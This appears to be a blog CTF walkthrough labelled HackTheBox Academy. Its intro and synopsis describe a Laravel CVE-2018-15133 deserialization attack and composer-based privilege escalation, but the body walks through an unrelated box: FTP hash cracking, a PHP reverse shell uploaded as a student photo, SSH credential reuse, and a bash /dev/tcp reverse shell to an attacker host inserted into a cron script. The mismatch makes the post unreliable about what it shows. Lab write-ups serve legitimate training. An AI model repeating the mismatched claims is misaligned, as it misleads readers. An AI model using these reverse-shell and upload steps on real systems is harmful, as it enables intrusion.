In this post, we demonstrated Laravel PHP CVE-2018-15133 and conducted privilege escalation by finding stored credentials. This video was part of HackTheBox Academy.

Blue Team Cyber Security & SOC Analyst Study Notes

OSCP Study Notes

HackTheBox Academy Machine Synopsis

Academy is an easy difficulty Linux machine that features an Apache server hosting a PHP website. The website is found to be the HTB Academy learning platform. Capturing the user registration request in Burp reveals that we are able to modify the Role ID, which allows us to access an admin portal. This reveals a vhost, that is found to be running on Laravel. Laravel debug mode is enabled, the exposed API Key and vulnerable version of Laravel allow us carry out a deserialization attack that results in Remote Code Execution. Examination of the Laravel `.env` file for another application reveals a password that is found to work for the `cry0l1t3` user, who is a member of the `adm` group. This allows us to read system logs, and the TTY input audit logs reveals the password for the `mrb3n` user. `mrb3n` has been granted permission to execute composer as root using `sudo`, which we can leverage in order to escalate our privileges.

Information Gathering and Scanning with Nmap

With nmap, we can scan the machine with below commnand:

nmap -p- -T4 <Target_IP> -A -sV -oN nmap.txt

Open ports found:

  • 21 FTP
  • 22 SSH
  • 80 HTP

Services Enumeration

FTP

FTP allows anonymous access and the below note was found

HackTheBox Academy CTF Walkthrough

Web Server Enumeration with Gobuster

We used the below command to enumerate directories and files:

gobuster dir -u http://<Target_IP>/ -w <Wordlist_Path>

Directories found:

  • /phpmyadmin
  • /academy

Hash cracking with Crackstation

With the note we got from the FTP server, we can insert the hash in crackstation and get the plain text password:

HackTheBox Academy CTF Walkthrough crackstation

Then you can use the password to login to the /academy page and where you will be prompted to change the password.

Initial foothold using file upload vulnerability and PHP reverse shell

After logging in to the /academy page, navigate to MY PROFILE page and you will see “student registration” page which shows your profile information. At this page, there is an option to uplaod student photo. This is where we will be uploading a php reverse shell.

Make sure to start a netcat listener based on the port found in the PHP reverse shell:

nc -lvp 4444

Having the listener set up and running, we can proceed and upload the php reverse shell and navigate to /academy/studentphoto/ to locate and verify the successful upload of the server shell.

Once you click on the file name, you will reveive the connection to your listener.

Linux privilege escalation and exploitation

First we upgrade the shell via tty:

python -c 'import pty; pty.spawn("/bin/bash")'

Under the web server directory, namely /var/www/html/academy/includes, we find a config.php file which contains mysql credentials. The mysql credentials won’t work on the database rather on the SSH server so log in with the credentials you found via ssh

ssh grimmie@academy.htb

Under the home directory /home/grimmie/ there is bash script named backup.sh

Open the file using nano text editor, comment all the lines and add the below to establish netcat reverse shell

/bin/sh -i >& /dev/tcp/<Attacker_IP>/<PORT> 0>&1

And if you have set up a listener on different port, you should receive the connection in a minute or two.

Check out the video below for detailed explanation.

HackTheBox Academy Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles